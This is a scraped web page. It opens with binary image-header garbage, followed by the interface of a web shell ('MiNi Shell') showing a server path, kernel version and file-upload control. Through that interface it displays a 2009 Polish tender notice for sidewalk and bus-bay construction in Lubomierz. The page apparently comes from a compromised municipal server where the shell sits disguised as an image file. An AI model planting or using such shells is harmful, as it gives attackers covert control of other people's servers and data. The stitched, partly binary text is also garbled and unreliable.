JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090716/242146-N-2009.html

<p class="kh_header"><b>Mszana Dolna: Budowa odcinków chodnika z zatokami i przejściami dla pieszych przy drodze wojewódzkiej nr 968 Lubień-Zabrzeż w Lubomierzu</b><br>
<b>Numer ogłoszenia: 242146 - 2009; data zamieszczenia: 16.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy , ul. Spadochroniarzy 6, 34-730 Mszana Dolna, woj. małopolskie, tel. 018 3310009 w. 615, 3319815, faks 018 3311242.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mszana.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa odcinków chodnika z zatokami i przejściami dla pieszych przy drodze wojewódzkiej nr 968 Lubień-Zabrzeż w Lubomierzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa lewostronnego chodnika wzdłuż drogi wojewódzkiej Lubień - Mszana Dolna - Zabrzeż  od km 19+964 do km 21+164 w miejscowości Lubomierz .
Zakres robót obejmuje: 
- budowę chodnika o szerokości 2,0 m na dł. około 1200 m,
- budowę studzienek wodnościekowych, przykrawężnikowych, 
- przebudowę zjazdów indywidualnych i publicznych,
- przebudowę przepustów rurowych,
- montaż osadników ilastych,
- montaż separatorów,
- umocnienie rowu korytkami betonowymi,
- budowa 2 zatok autobusowych w miejscu przystanków,
- poszerzenie jezdni na całej długości ,
 
   wymagany okres gwarancji:
   - na wykonane roboty( materiały i robociznę ) wynosi 36 miesięcy  od dnia odebrania przez zamawiającego robót budowlanych i podpisania bez uwag protokołu końcowego ,
    
Przedmiot zamówienia zawierający szczegółowy zakres robót precyzuje szczegółowa specyfikacja techniczna, dokumentacja projektowa, przedmiar robót i kosztorys ślepy,  które Wykonawcy otrzymują w celu sporządzenia kosztorysu ofertowego i oferty ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w
wysokości : 20.000,00 PLN  .Wadium może być wnoszone w jednej lub kilku następujących
formach: a) pieniądzu:przelewem na rachunek bankowy Zamawiającego: BS Mszana
Dolna Nr 64 8808 0006 0010 0000 1690 0036
b)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
 kredytowej,  z tym że  poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych; d) gwarancjach ubezpieczeniowych
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2   
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju    Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
W przypadku wadium wnoszonego w pieniądzu należy dołączyć kopię polecenia przelewu do oferty.
W przypadku wadium wnoszonego w innych dopuszczonych formach należy złożyć oryginał dokumentu z ofertą . 

Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego zamawiający będzie uważał za skuteczne tylko wówczas , gdy bank prowadzący rachunek Zamawiającego potwierdzi , ze otrzymał taki przelew przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy,
 którzy: 
1) posiadają uprawnienia do wykonywania  działalności lub czynności w zakresie
    odpowiadającym przedmiotowi zamówienia oraz nie podlegają wykluczeniu na
    podstawie art.24 u.p.z.p. W celu potwierdzenia spełnienia niniejszego warunku
    Wykonawcy zobowiązani są przedłożyć następujące dokumenty: 

a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do           
      ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu   
      do rejestru lub zgłoszenia do ewidencji  - za aktualny będzie uważany 
      dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu 
      składania ofert w formie odpisu lub zaświadczenia potwierdzającego, iż Wykonawca     
      nadal figuruje w rejestrze działalności.
b)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz    właściwego oddziału Zakładu Ubezpieczeń społecznych lub kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio , że wykonawca nie zalega z opłacaniem podatków opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń  że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności. lub wstrzymanie w całości wykonania decyzji właściwego organu  Za ważne będzie uznane zaświadczenie wystawione przez ZUS , US lub KRUS nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców muszą być złożone dokumenty dotyczące każdego z nich (a, b) .


2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem
    technicznym i osobami  zdolnymi do wykonania zamówienia lub przedstawią
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału
    technicznego i osób zdolnych do wykonania zamówienia . W szczególności muszą
    spełnić następujący  warunek : 

    a)  Kierownik Robót  - niniejsza osoba ma posiadać kwalifikacje  co najmniej 5 lat nabytego doświadczenia zawodowego, posiadający uprawnienia budowlane w zakresie niezbędnym do wykonania zamówienia -  oraz zaświadczenia  wydanego przez właściwą izbę samorządu zawodowego (OIIB) potwierdzającego wpis danej osoby na listę członków właściwej izby .
 
     b) wykażą się wykonaniem w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy w tym okresie rzetelnie i należycie co najmniej dwóch  robót budowlanych polegających na budowie chodników i zatok autobusowych ( drogi wojewódzkie, krajowe, powiatowe), w zakresie obejmującym  przedmiot zamówienia .
  
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
    zamówienia; 

    a) posiadają środki finansowe w wysokości co najmniej 500.000,00 PLN lub zdolność  kredytową w wysokości co najmniej 500.000,00 PLN ,

    b) posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż  500.000,00 PLN . 

4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art.24 Ustawy Prawo zamówień Publicznych . 


W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub
więcej Wykonawców oceniane będzie łącznie  ich doświadczenie i sytuacja
ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci
Wykonawcy , którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku .

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach
 ( wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu wykazania spełnienia warunków udziału w ostępowaniu, każdy z Wykonawców  przedkłada  wraz z ofertą  sporządzoną na formularzu OFERTA ( Zał. Nr 1 do SIWZ) następujące oświadczenia dokumenty,  informacje i wykazy składające się na ofertę:

1. Oświadczenie wykonawcy, że akceptuje projekt umowy ( ZAł. Nr 2 do SIWZ) ,

2. Kosztorys ofertowy uproszczony  - wyceniony na podstawie przedmiaru robót,

      3. wykaz osób odpowiedzialnych za realizację zamówienia publicznego ( kierownicy robót - uprawnienia , przynależność do właściwej izby samorządu zawodowego , informacji z przebiegu pracy zawodowej potwierdzającej spełnienie warunków zamawiającego   oraz wykazu  pracowników  przewidzianych do  udziału w wykonaniu zamówienia publicznego Zał. Nr 3 do SIWZ ,

      4. wykaz wykonanych robót budowlanych  oraz dokumenty potwierdzające , że roboty te zostały wykonane należycie, Zaleca się żeby przedkładane dokumenty potwierdzały , że wykonane przez Wykonawcę roboty zostały wykonane należycie zawierały co najmniej : a) wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował roboty których dokumenty dotyczą, b) wskazanie podmiotu na rzecz którego realizowane były roboty, c) wskazanie zakresu robót, d) wskazanie wartości robót, e) wskazanie daty wykonania ( rozpoczęcia  i zakończenia ), f) wskazanie miejsca wykonania, g) opinię podmiotu wskazanego powyżej w pkt.b stwierdzającą, że roboty te zostały wykonane należycie (Zał. Nr 4 do SIWZ ) .    

5. informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej , wystawiona nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert potwierdzająca posiadanie środków finansowych lub posiadanie przez wykonawcę zdolności kredytowej ,

6.polisa a w przypadku jej braku inny dokument potwierdzający , że wykonawca   
 jest ubezpieczony  od odpowiedzialności cywilnej  w zakresie prowadzonej 
działalności, 

7. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do           
ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu   
do rejestru lub zgłoszenia do ewidencji - wystawione nie wcześniej niż 6 
miesięcy przed upływem terminu składania ofert, 
  
8. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz    
właściwego oddziału Zakładu Ubezpieczeń społecznych lub kasy Rolniczego  
Ubezpieczenia Społecznego- wystawione nie wcześniej niż 3 
miesiące przed upływem terminu składania ofert, 
 
9. zabezpieczenie oferty wadium.

10. Oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 22 i 24 ust. 1 Ustawy Prawo zamówień publicznych  zał. Nr 6, 

Ponadto wykonawcy wspólnie ubiegający się o udzielenie zamówienia złożą Pełnomocnictwo dla pełnomocnika, do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mszana.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy 34-730 Mszana Dolna ul. Spadochroniarzy 6 pok. nr 44.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2009 godzina 10:00, miejsce: Urzad gminy Mszana Dolna ul. Spadochroniarzy 6 pok. nr 32 - sekretariat urzędu.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com